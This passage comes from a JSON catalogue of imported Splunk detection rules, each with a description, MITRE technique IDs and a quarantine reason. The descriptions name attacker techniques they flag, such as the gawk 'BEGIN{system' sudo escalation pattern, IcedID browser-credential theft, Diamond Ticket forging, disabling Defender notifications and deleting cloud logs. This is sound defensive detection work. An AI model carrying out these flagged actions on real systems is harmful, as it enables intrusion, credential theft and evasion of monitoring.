"upstream_path": "detections/endpoint/windows_ad_gpo_deleted.yml" } }, { "id": "splunk-security-content-0d42b295-0f1f-4183-b75e-377975f47c65", "type": "detection", "name": "Kubernetes Process with Resource Ratio Anomalies", "description": "The following analytic detects anomalous changes in resource utilization ratios for processes running on a Kubernetes node. It leverages process metrics collected via an OTEL collector and hostmetrics receiver, analyzed through Splunk Observability Cloud. The detection uses a lookup table containing average and standard deviation values for various resource ratios (e.g., CPU:memory, CPU:disk operations). Significant deviations from these baselines may indicate compromised processes, malicious activity, or misconfigurations. If confirmed malicious, this could signify a security breach, allowing attackers to manipulate workloads, potentially leading to data exfiltration or service disruption.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-process-with-resource-ratio-anomalies.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0d42b295-0f1f-4183-b75e-377975f47c65", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_process_with_resource_ratio_anomalies.yml" } }, { "id": "splunk-security-content-0d718b52-c9f1-11eb-bc61-acde48001122", "type": "detection", "name": "Powershell Processing Stream Of Data", "description": "The following analytic detects 
suspicious PowerShell script execution involving compressed stream data processing, identified via EventCode 4104. It leverages PowerShell Script Block Logging to flag scripts using `IO.Compression`, `IO.StreamReader`, or decompression methods. This activity is significant as it often indicates obfuscated PowerShell or embedded .NET/binary execution, which are common tactics for evading detection. If confirmed malicious, this behavior could allow attackers to execute hidden code, escalate privileges, or maintain persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-processing-stream-of-data.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0d718b52-c9f1-11eb-bc61-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_processing_stream_of_data.yml" } }, { "id": "splunk-security-content-0db4da70-f14b-11eb-8043-acde48001122", "type": "detection", "name": "IcedID Exfiltrated Archived File Creation", "description": "The following analytic detects the creation of suspicious files named passff.tar and cookie.tar, which are indicative of archived stolen browser information such as history and cookies on a machine compromised with IcedID. It leverages Sysmon EventCode 11 to identify these specific filenames. 
This activity is significant because it suggests that sensitive browser data has been exfiltrated, which could lead to further exploitation or data breaches. If confirmed malicious, this could allow attackers to access personal information, conduct further phishing attacks, or escalate their presence within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/icedid-exfiltrated-archived-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0db4da70-f14b-11eb-8043-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/icedid_exfiltrated_archived_file_creation.yml" } }, { "id": "splunk-security-content-0dbcac64-963c-11ec-bf04-acde48001122", "type": "detection", "name": "Windows File Without Extension In Critical Folder", "description": "This analytic detects the creation of files without extensions in critical Windows system and driver-related directories, including but not limited to System32\\Drivers, Windows\\WinSxS, and other known Windows driver storage and loading paths. The detection has been expanded to comprehensively cover all commonly abused and legitimate Windows driver folder locations, increasing visibility into attempts to stage or deploy kernel-mode components. The analytic leverages telemetry from the Endpoint.Filesystem data model, with a focus on file creation events and file path analysis. 
File creation activity in these directories\u2014particularly involving extensionless files\u2014is highly suspicious, as it may indicate the presence of destructive or stealthy malware. This behavior is consistent with malware families such as HermeticWiper, which deploy kernel driver components into trusted Windows driver directories to obtain low-level access and execute destructive payloads. If confirmed malicious, this activity can result in severe system compromise, including the deployment of malicious drivers, boot-sector or filesystem destruction, and ultimately system inoperability and irreversible data loss.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-file-without-extension-in-critical-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0dbcac64-963c-11ec-bf04-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_file_without_extension_in_critical_folder.yml" } }, { "id": "splunk-security-content-0dc25c24-6fcf-456f-b08b-dd55a183e4de", "type": "detection", "name": "Windows Service Stop Win Updates", "description": "The following analytic detects the disabling of Windows Update services, such as \"Update Orchestrator Service for Windows Update,\" \"WaaSMedicSvc,\" and \"Windows Update.\" It leverages Windows System Event ID 7040 logs to identify changes in service start modes to 'disabled.' 
This activity is significant as it can indicate an adversary's attempt to evade defenses by preventing critical updates, leaving the system vulnerable to exploits. If confirmed malicious, this could allow attackers to maintain persistence and exploit unpatched vulnerabilities, compromising the integrity and security of the affected host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-service-stop-win-updates.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0dc25c24-6fcf-456f-b08b-dd55a183e4de", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_service_stop_win_updates.yml" } }, { "id": "splunk-security-content-0dc44d03-8c00-482d-ba7c-796ba7ab18c9", "type": "detection", "name": "Windows Remote Create Service", "description": "The following analytic identifies the creation of a new service on a remote endpoint using sc.exe. It leverages data from Endpoint Detection and Response (EDR) agents, specifically monitoring for EventCode 7045, which indicates a new service creation. This activity is significant as it may indicate lateral movement or remote code execution attempts by an attacker. 
If confirmed malicious, this could allow the attacker to establish persistence, escalate privileges, or execute arbitrary code on the remote system, potentially leading to further compromise of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-remote-create-service.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0dc44d03-8c00-482d-ba7c-796ba7ab18c9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_remote_create_service.yml" } }, { "id": "splunk-security-content-0dcf43b9-50d8-42a6-acd9-d1c9201fe6ae", "type": "detection", "name": "Linux GNU Awk Privilege Escalation", "description": "The following analytic detects the execution of the 'gawk' command with elevated privileges on a Linux system. It leverages Endpoint Detection and Response (EDR) telemetry to identify command-line executions where 'gawk' is used with 'sudo' and 'BEGIN{system' patterns. This activity is significant because it indicates a potential privilege escalation attempt, allowing a user to execute system commands as root. 
If confirmed malicious, this could lead to full root access, enabling the attacker to control the system, modify critical files, and maintain persistent access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-gnu-awk-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0dcf43b9-50d8-42a6-acd9-d1c9201fe6ae", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_gnu_awk_privilege_escalation.yml" } }, { "id": "splunk-security-content-0dd296a2-4338-11ec-ba02-3e22fbd008af", "type": "detection", "name": "Remote Process Instantiation via WinRM and Winrs", "description": "The following analytic detects the execution of `winrs.exe` with command-line arguments used to start a process on a remote endpoint. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions mapped to the `Processes` node of the `Endpoint` data model. This activity is significant as it may indicate lateral movement or remote code execution attempts by adversaries. 
If confirmed malicious, this could allow attackers to execute arbitrary code on remote systems, potentially leading to further compromise and lateral spread within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/remote-process-instantiation-via-winrm-and-winrs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0dd296a2-4338-11ec-ba02-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/remote_process_instantiation_via_winrm_and_winrs.yml" } }, { "id": "splunk-security-content-0df33e1a-9ef6-11ec-a1ad-acde48001122", "type": "detection", "name": "Windows Disable Change Password Through Registry", "description": "The following analytic detects a suspicious registry modification that disables the Change Password feature on a Windows host. It identifies changes to the registry path \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableChangePassword\" with a value of \"0x00000001\". This activity is significant as it can prevent users from changing their passwords, a tactic often used by ransomware to maintain control over compromised systems. 
If confirmed malicious, this could hinder user response to an attack, allowing the attacker to persist and potentially escalate their access within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-disable-change-password-through-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0df33e1a-9ef6-11ec-a1ad-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_disable_change_password_through_registry.yml" } }, { "id": "splunk-security-content-0df524ad-6d78-4883-9987-d29418928103", "type": "detection", "name": "Crowdstrike High Identity Risk Severity", "description": "The following analytic detects CrowdStrike alerts for High Identity Risk Severity with a risk score of 70 or higher. These alerts indicate significant vulnerabilities in user identities, such as suspicious behavior or compromised credentials. 
Promptly investigating and addressing these alerts is crucial to prevent potential security breaches and ensure the integrity and protection of sensitive information and systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/crowdstrike-high-identity-risk-severity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0df524ad-6d78-4883-9987-d29418928103", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/crowdstrike_high_identity_risk_severity.yml" } }, { "id": "splunk-security-content-0e4d46b1-22bd-4f0e-8337-ca6f60ad4bea", "type": "detection", "name": "Windows Defender ASR Audit Events", "description": "This detection searches for Windows Defender ASR audit events. ASR is a feature of Windows Defender Exploit Guard that prevents actions and apps that are typically used by exploit-seeking malware to infect machines. ASR rules are applied to processes and applications. When a process or application attempts to perform an action that is blocked by an ASR rule, an event is generated. 
This detection searches for ASR audit events that are generated when a process or application attempts to perform an action that would be blocked by an ASR rule, but is allowed to proceed for auditing purposes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1566.001", "T1566.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-defender-asr-audit-events.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0e4d46b1-22bd-4f0e-8337-ca6f60ad4bea", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_defender_asr_audit_events.yml" } }, { "id": "splunk-security-content-0e5e25c3-32f4-46f7-ba4a-5b95c3b90f5b", "type": "detection", "name": "Windows Modify Registry Disable Win Defender Raw Write Notif", "description": "The following analytic detects modifications to the Windows registry that disable the Windows Defender raw write notification feature. It leverages data from the Endpoint.Registry datamodel, specifically monitoring changes to the registry path associated with Windows Defender's real-time protection settings. This activity is significant because disabling raw write notifications can allow malware, such as Azorult, to bypass Windows Defender's behavior monitoring, potentially leading to undetected malicious activities. 
If confirmed malicious, this could enable attackers to execute code, persist in the environment, and access sensitive information without detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-disable-win-defender-raw-write-notif.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0e5e25c3-32f4-46f7-ba4a-5b95c3b90f5b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_disable_win_defender_raw_write_notif.yml" } }, { "id": "splunk-security-content-0ecb40d9-492b-4a57-9f87-515dd742794c", "type": "detection", "name": "Windows AutoIt3 Execution", "description": "The following analytic detects the execution of AutoIt3, a scripting\nlanguage often used for automating Windows GUI tasks and general scripting.\nIt identifies instances where AutoIt3 or its variants are executed by searching for process names\nor original file names matching 'autoit3.exe'.\nThis activity is significant because attackers frequently use AutoIt3 to automate malicious actions, such as executing malware.\nIf confirmed malicious, this activity could lead to unauthorized code execution,\nsystem compromise, or further propagation of malware within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": 
"splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-autoit3-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0ecb40d9-492b-4a57-9f87-515dd742794c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_autoit3_execution.yml" } }, { "id": "splunk-security-content-0edd5112-56c9-11ec-b990-acde48001122", "type": "detection", "name": "Suspicious Linux Discovery Commands", "description": "The following analytic detects the execution of suspicious bash commands commonly used in scripts like AutoSUID, LinEnum, and LinPeas for system discovery on a Linux host. It leverages Endpoint Detection and Response (EDR) data, specifically looking for a high number of distinct commands executed within a short time frame. This activity is significant as it often precedes privilege escalation or other malicious actions. 
If confirmed malicious, an attacker could gain detailed system information, identify vulnerabilities, and potentially escalate privileges, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-linux-discovery-commands.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0edd5112-56c9-11ec-b990-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_linux_discovery_commands.yml" } }, { "id": "splunk-security-content-0f09cedd-10f1-4b9f-bdea-7a8b06ea575d", "type": "detection", "name": "Windows PowerShell Script Block With Malicious String", "description": "The following analytic detects the execution of multiple offensive toolkits and commands by leveraging PowerShell Script Block Logging (EventCode=4104). This method captures and logs the full command sent to PowerShell, allowing for the identification of suspicious activities including several well-known tools used for credential theft, lateral movement, and persistence. 
If confirmed malicious, this could lead to unauthorized access, privilege escalation, and potential compromise of sensitive information within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-script-block-with-malicious-string.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0f09cedd-10f1-4b9f-bdea-7a8b06ea575d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_script_block_with_malicious_string.yml" } }, { "id": "splunk-security-content-0f216a38-f45f-11eb-b09c-acde48001122", "type": "detection", "name": "Sqlite Module In Temp Folder", "description": "The following analytic detects the creation of sqlite3.dll files in the %temp% folder. It leverages Sysmon EventCode 11 to identify when these files are written to the temporary directory. This activity is significant because it is associated with IcedID malware, which uses the sqlite3 module to parse browser databases and steal sensitive information such as banking details, credit card information, and credentials. 
If confirmed malicious, this behavior could lead to significant data theft and compromise of user accounts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/sqlite-module-in-temp-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0f216a38-f45f-11eb-b09c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/sqlite_module_in_temp_folder.yml" } }, { "id": "splunk-security-content-0f43758f-1fe9-470a-a9e4-780acc4d5407", "type": "detection", "name": "Windows File Transfer Protocol In Non-Common Process Path", "description": "The following analytic detects FTP connections initiated by processes located in non-standard installation paths on Windows systems. It leverages Sysmon EventCode 3 to identify network connections where the process image path does not match common directories like \"Program Files\" or \"Windows\\System32\". This activity is significant as FTP is often used by adversaries and malware, such as AgentTesla, for Command and Control (C2) communications to exfiltrate stolen data. 
If confirmed malicious, this could lead to unauthorized data transfer, exposing sensitive information and compromising the integrity of the affected host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-file-transfer-protocol-in-non-common-process-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0f43758f-1fe9-470a-a9e4-780acc4d5407", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_file_transfer_protocol_in_non_common_process_path.yml" } }, { "id": "splunk-security-content-0f701b38-a0fb-43fd-a83d-d12265f71f33", "type": "detection", "name": "ASL AWS Defense Evasion Delete CloudWatch Log Group", "description": "The following analytic detects the deletion of CloudWatch log groups in AWS, identified through `DeleteLogGroup` events in CloudTrail logs. This method leverages Amazon Security Lake logs parsed in the OCSF format. The activity is significant because attackers may delete log groups to evade detection and disrupt logging capabilities, hindering incident response efforts. 
If confirmed malicious, this action could allow attackers to cover their tracks, making it difficult to trace their activities and potentially leading to undetected data breaches or further malicious actions within the compromised AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-defense-evasion-delete-cloudwatch-log-group.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0f701b38-a0fb-43fd-a83d-d12265f71f33", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_defense_evasion_delete_cloudwatch_log_group.yml" } }, { "id": "splunk-security-content-0f83244b-425b-4528-83db-7a88c5f66e48", "type": "detection", "name": "Kubernetes Nginx Ingress LFI", "description": "The following analytic detects local file inclusion (LFI) attacks targeting Kubernetes Nginx ingress controllers. It leverages Kubernetes logs, parsing fields such as `request` and `status` to identify suspicious patterns indicative of LFI attempts. This activity is significant because LFI attacks can allow attackers to read sensitive files from the server, potentially exposing critical information. 
If confirmed malicious, this could lead to unauthorized access to sensitive data, further exploitation, and potential compromise of the Kubernetes environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1212" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-nginx-ingress-lfi.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0f83244b-425b-4528-83db-7a88c5f66e48", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_nginx_ingress_lfi.yml" } }, { "id": "splunk-security-content-0fa86e31-0f73-4ec7-9ca3-dc88e117f1db", "type": "detection", "name": "Windows New InProcServer32 Added", "description": "The following analytic detects the addition of new InProcServer32 registry keys on Windows endpoints. It leverages data from the Endpoint.Registry datamodel to identify changes in registry paths associated with InProcServer32. This activity is significant because malware often uses this mechanism to achieve persistence or execute malicious code by registering a new InProcServer32 key pointing to a harmful DLL. 
If confirmed malicious, this could allow an attacker to persist in the environment or execute arbitrary code, posing a significant threat to system integrity and security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-new-inprocserver32-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0fa86e31-0f73-4ec7-9ca3-dc88e117f1db", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_new_inprocserver32_added.yml" } }, { "id": "splunk-security-content-0fe052a5-07b8-48e7-9fc8-d6a3957eb914", "type": "detection", "name": "Cisco SD-WAN - Low Frequency Rogue Peer", "description": "This analytic identifies low-frequency Cisco SD-WAN control peering activity from control-connection-state-change events where \"new-state:up\".\n\nIt extracts \"peer-type\" and \"peer-system-ip\", groups events by these two fields, and counts how often each combination appears within the selected time window.\n\nCombinations whose count is less than or equal to the defined threshold (currently <=3 occurrences in the search window) are flagged as rare.\n\nAnalysts should prioritize peer identities that are rarely observed in the environment, particularly those involving unexpected peer-type roles or unfamiliar peer-system-ip values.\nRare control-plane peers may indicate misconfiguration, unauthorized SD-WAN components, infrastructure drift, or potentially malicious control-plane connection attempts.\n\nFindings 
might indicate the potential exploitation of CVE-2026-20127.\n\nNote that the threshold setting is set to \"3\", but it is highly recommended that this be adapted to the environment before deploying this search.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-sd-wan-low-frequency-rogue-peer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0fe052a5-07b8-48e7-9fc8-d6a3957eb914", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_sd_wan___low_frequency_rogue_peer.yml" } }, { "id": "splunk-security-content-102af98d-0ca3-4aa4-98d6-7ab2b98b955a", "type": "detection", "name": "Windows Powershell Import Applocker Policy", "description": "The following analytic detects the import of Windows PowerShell Applocker cmdlets, specifically identifying the use of \"Import-Module Applocker\" and \"Set-AppLockerPolicy\" with an XML policy. It leverages PowerShell Script Block Logging (EventCode 4104) to capture and analyze script block text. This activity is significant as it may indicate an attempt to enforce restrictive Applocker policies, potentially used by malware like Azorult to disable antivirus products. 
If confirmed malicious, this could allow an attacker to bypass security controls, leading to further system compromise and persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-import-applocker-policy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "102af98d-0ca3-4aa4-98d6-7ab2b98b955a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_import_applocker_policy.yml" } }, { "id": "splunk-security-content-10381f93-6d38-470a-9c30-d25478e3bd3f", "type": "detection", "name": "Windows Domain Admin Impersonation Indicator", "description": "The following analytic identifies potential Kerberos ticket forging attacks, specifically the Diamond Ticket attack. This is detected when a user logs into a host and the GroupMembership field in event 4627 indicates a privileged group (e.g., Domain Admins), but the user does not actually belong to that group in the directory service. The detection leverages Windows Security Event Log 4627, which logs account logon events. The analytic cross-references the GroupMembership field from the event against a pre-populated lookup of actual group memberships. It is crucial to note that the accuracy and effectiveness of this detection rely heavily on the user's diligence in populating and regularly updating this lookup table. 
Any discrepancies between the event's GroupMembership and the lookup indicate potential ticket forging. Kerberos ticket forging, especially the Diamond Ticket attack, allows attackers to impersonate any user and potentially gain unauthorized access to resources. By forging a ticket that indicates membership in a privileged group, an attacker can bypass security controls and gain elevated privileges. Detecting such discrepancies in group memberships during logon events can be a strong indicator of this attack in progress, making it crucial for security teams to monitor and investigate. If validated as a true positive, this indicates that an attacker has successfully forged a Kerberos ticket and may have gained unauthorized access to critical resources, potentially with elevated privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-domain-admin-impersonation-indicator.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "10381f93-6d38-470a-9c30-d25478e3bd3f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_domain_admin_impersonation_indicator.yml" } }, { "id": "splunk-security-content-10399c1e-f51e-11eb-b920-acde48001122", "type": 